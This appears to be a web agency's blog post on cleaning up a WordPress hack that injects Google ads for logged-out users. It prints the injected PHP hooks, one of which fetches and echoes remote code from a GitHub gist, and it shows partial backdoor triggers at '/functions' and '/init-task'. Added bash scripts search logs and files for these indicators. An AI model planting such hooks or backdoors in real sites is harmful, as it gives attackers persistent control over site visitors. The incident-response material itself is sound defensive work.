Recently we’ve seen a few cases of a new WordPress hack which manages to display Google ads on every page of a website, but only for logged-out users. You may also experience other mysterious symptoms such as pages being moved to the trash.
While it’s not particularly malicious, it’s still annoying and can undermine the credibility of your organization, in addition to revealing security problems with your website.
For these reasons, we strongly recommend you act immediately to secure your site.
Below, I will outline how the hack works, share some code examples, and then explain the solution to this frustrating problem.
*Note: as with any change to your website, I strongly recommend backing up both your website files and database before proceeding. If you mess something up, the backup may be your only way to restore the site unless you have quality website hosting.
Description of this WordPress Hack
The most obvious symptom of this particular hack is that your website will display ads on every page, but only to logged-out users. This is a common technique used to prevent site owners from realizing that their website has been hacked, since they are typically logged-in and may not see the ads.
The code added to the site includes this line, which prevents anything from being added if the current user is logged-in:
```php
if (!is_user_logged_in() || !current_user_can('administrator')) {
```
Curiously, this code appears to be redundant. Basically, it checks to make sure the current user is neither logged-in nor an administrator. But you can’t be an administrator if you aren’t logged-in.
Often, this type of code is not written by truly talented individuals, or potentially by humans at all. It may have sort of “evolved” that way or been written by AI. But I digress.
We have found two specific sections of code, both of which lead to the same thing: Google ads in the footer for logged-out users. Here are both of those snippets of code.
```php
function wp_code() {
    if (!is_user_logged_in() || !current_user_can('administrator')) {
        echo '<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-9156332944666352" crossorigin="anonymous"></script>';
    }
}
add_action('wp_head', 'wp_code');
```
This first one is pretty direct and leaves no question as to what it is trying to do.
This second one does the same thing, but is obfuscated by hosting the code at GitHub.
```php
function wp_config_trigger() {
    if (!is_user_logged_in() || !current_user_can('administrator')) {
        $code_url = 'https://gist.githubusercontent.com/mskhott/295129cc441362414e5b54ea5896a4d7/raw/71a1177b65b476f2b7e9cdbed374a3af993fa6c7/gistfile1.txt';
        $code = file_get_contents($code_url);
        echo $code;
    }
}
add_action('wp_head', 'wp_config_trigger');
```
We found these snippets of code in two places:
- The end of core WordPress files in the site root (wp-config.php and wp-load.php, in our cases)
- The end of WordPress plugin files (custom plugins in our case, but it could be any plugin)
The result of both was the same. This script was added somewhere in the site footer, which then loaded Google ads:
```html
<script data-jc="26" src="https://tpc.googlesyndication.com/pagead/js/r20240605/r20110914/client/load_preloaded_resource_fy2021.js" async="" data-jc-version="r20240605"></script>
```
Note that if you were to inspect the ads code, you would see something other than the above. That’s because the above code basically loads external code from Google, and then adds a bunch more HTML and other scripts to the site.
In addition to the Google ads, we also determined that, for whatever reason, this hack would randomly delete website pages and we’d find them in the trash. This caused problems with our menu and also some confusion when content seemed to go missing.
We also found that code had been added to our theme’s functions.php file which gave the attackers a backdoor to keep adding their Google Ads code over and over again, even after being removed. This backdoor allowed anyone to log in as an admin by simply accessing the path /functions on our site. Here is the start of the code (I’m not sharing the full code because I don’t want malicious actors to be able to re-use it):
```php
add_action('init', 'discreet_activation');
function discreet_activation(){
    if ($_SERVER['REQUEST_URI'] == '/functions') {
```
An alternative code block we found from the same hack starts like this:
```php
add_action('init', 'function_trigger');
function function_trigger() {
    if ($_SERVER['REQUEST_URI'] == '/init-task') {
        if (!is_user_logged_in()) {
```
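To see whether either trigger path has ever been requested on your site, you can search the web server's access log for the exact URIs. The script below is an added example, not code from the hack or from the original article; it assumes the Apache/Nginx combined log format, and the function names and sample log lines are constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example (not from the article). Assumes the "combined" access log format:
# $1 = client IP, $4 = "[timestamp", $7 = request URI, $9 = status code.

# Constructed sample log lines (documentation IP ranges, invented statuses).
sample_log() {
cat <<'EOF'
203.0.113.7 - - [05/Jun/2024:10:01:02 +0000] "GET /functions HTTP/1.1" 302 0 "-" "curl/8.0"
203.0.113.7 - - [05/Jun/2024:10:05:40 +0000] "GET /functions HTTP/1.1" 302 0 "-" "curl/8.0"
198.51.100.9 - - [05/Jun/2024:11:00:00 +0000] "GET /functions?x=1 HTTP/1.1" 404 512 "-" "Mozilla/5.0"
198.51.100.9 - - [05/Jun/2024:11:00:05 +0000] "GET /init-task HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
192.0.2.44 - - [05/Jun/2024:12:00:00 +0000] "GET /wp-content/themes/x/functions.php HTTP/1.1" 403 0 "-" "Mozilla/5.0"
EOF
}

# Summarise requests for the two trigger paths named in the article.
# The injected code compares REQUEST_URI with ==, so only the exact path
# (no query string, no trailing slash) reaches the backdoor branch.
find_backdoor_hits() {
    awk '
        $7 == "/functions" || $7 == "/init-task" {
            key = $1 "\t" $7
            hits[key]++
            if (!(key in first)) first[key] = substr($4, 2)
            last[key] = substr($4, 2)
            if (index(codes[key], $9) == 0)
                codes[key] = codes[key] (codes[key] == "" ? "" : ",") $9
        }
        END {
            # Columns: IP, path, hits, first seen, last seen, status codes
            for (k in hits)
                printf "%s\t%d\t%s\t%s\t%s\n", k, hits[k], first[k], last[k], codes[k]
        }' "${1:--}" | sort
}

# Demo on the sample; for a real site pass the log path instead.
sample_log | find_backdoor_hits -
```

Any hit on these paths for a site that has no legitimate page there is worth following up, and the earliest timestamp helps you pick a backup that predates the compromise.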
Solution to Google Ad Hack
The solution to this hack is similar to most hacks, with a few extra steps. In general, the first step is to secure the site, then restore things as needed.
Note that if you have quality website hosting and can easily restore your site from a backup of a time when you know there were no issues, that’s probably your safest bet. Then you can simply update all of your plugins and run some security scans to prevent the hack from happening again.
However, if you don’t have that as an option (either because your hosting is bad or because too much has changed on your site to go back), here is how I would remove the hack.
- Replace all WordPress core files (Dashboard -> Updates -> Reinstall Version x.x.x should work, although doing it manually is better)
- Update all of your plugins, theme files, and WordPress itself to their newest versions (make sure you have active licenses to premium plugins and themes so that you can properly update them)
- Install and activate the Wordfence plugin and run a scan of your site
- Once that has finished, review the results of the scan. Restore original versions of WordPress and core files and remove any unnecessary, infected files
- If any plugins have been identified as abandoned, you should probably deactivate and delete them (make other arrangements for their functionality, if necessary. Consider running a plugin audit to help you decide what to do)
- Search the content of all files in your site for “googlesyndication” and “gist.githubusercontent.com” – there are a variety of ways to search file contents. Perhaps your hosting has a tool for this. If you have no other options, you can use either SSH to search through the files, or download the site using FTP and search locally
- If you’ve found any instances of those strings, check to make sure this isn’t code that’s adding the ads. If it is, you’ll want to remove that part of the code
- Inspect all admin users on the website, and delete any that aren’t needed or are suspicious
- Search your theme’s functions.php file and check for the “discreet_activation” function. Remove it, if found. You may also want to search your whole site using SSH for this script as well.
- Reset all admin passwords to ensure attackers don’t have access via one of them
- Run one final Wordfence scan to ensure your site is now secure
- Check the trash for pages and posts and restore any that should be active
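For the file-search steps above, if you have SSH access, the following script covers them in one pass. It is an added example, not part of the original article: it searches for the strings and function names shown earlier on this page and marks hits that sit near the end of a file, since that is where the injected snippets were found. The function name, the 15-line window and the output layout are choices made for this example.

```bash
#!/usr/bin/env bash
# Added example (not from the article): list files containing the strings the
# article names, and flag matches near the end of a file.
# TAIL_WINDOW and the output layout are choices made for this example.

PATTERN='googlesyndication|gist\.githubusercontent\.com|discreet_activation|function_trigger|wp_config_trigger|function wp_code\('
TAIL_WINDOW=15

scan_wp_indicators() {
    root="${1:-.}"
    # -r recurse, -I skip binary files, -l print file names only, -E extended regex
    grep -rIlE "$PATTERN" "$root" 2>/dev/null | sort |
    while IFS= read -r file; do
        total=$(wc -l < "$file")
        grep -nE "$PATTERN" "$file" |
        while IFS=: read -r line text; do
            # The article found the snippets appended to the end of files.
            where=BODY
            if [ "$line" -gt $((total - TAIL_WINDOW)) ]; then where=TAIL; fi
            printf '%s\t%s:%s\t%s\n' "$where" "$file" "$line" "$text"
        done
    done
}

# Usage: ./scan.sh /path/to/wordpress
if [ "$#" -gt 0 ]; then scan_wp_indicators "$1"; fi
```

A BODY hit for googlesyndication may simply be your own AdSense code or an ads plugin, so review each match before deleting anything; TAIL hits in wp-config.php, wp-load.php or plugin files match the placement described above.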
Once you’ve completed all of these steps, you should have removed the code that adds the Google ads to your footer, in addition to the original vulnerability that led to your site being hacked.
One final note: I hesitate to add this, but I think it might help people.
You can hide the Google ads section simply by adding the following code to your theme’s style.css:
```css
.google-auto-placed {
    display: none;
}
```
The only issue here is that if you do this, you might not even notice you’ve been hacked. It would simply hide the symptom.
But it might be a good idea to add this in if you are having trouble pinpointing where it’s coming from. Then at least nobody will see the ads until you’ve figured out how to solve it.
It’s quick and dirty but works!
Conclusion: this is far from the worst that could happen, so stay secure
As far as website hacks go, this one is actually pretty tame. It just displays legitimate Google ads, as opposed to offensive content or sending people to shady websites and infecting them with malware.
Consider yourself lucky!
But you should take this as a warning. If you just got hacked, you need to start taking things more seriously.
In the future, you need to make absolutely sure that you are updating all plugins and themes and WordPress core files regularly. Delete abandoned plugins and themes. Regularly update passwords. Use a security plugin and quality, secure hosting.
This time it was just some harmless ads. Next time, your visitors may get hacked themselves or see wildly offensive content. Or worse! Their credit card information could be stolen and you could be liable for it.
If you need help dealing with this hack, or if you’d like us to review your site and make sure it is secure, please use the form below to reach out and we’ll respond right away.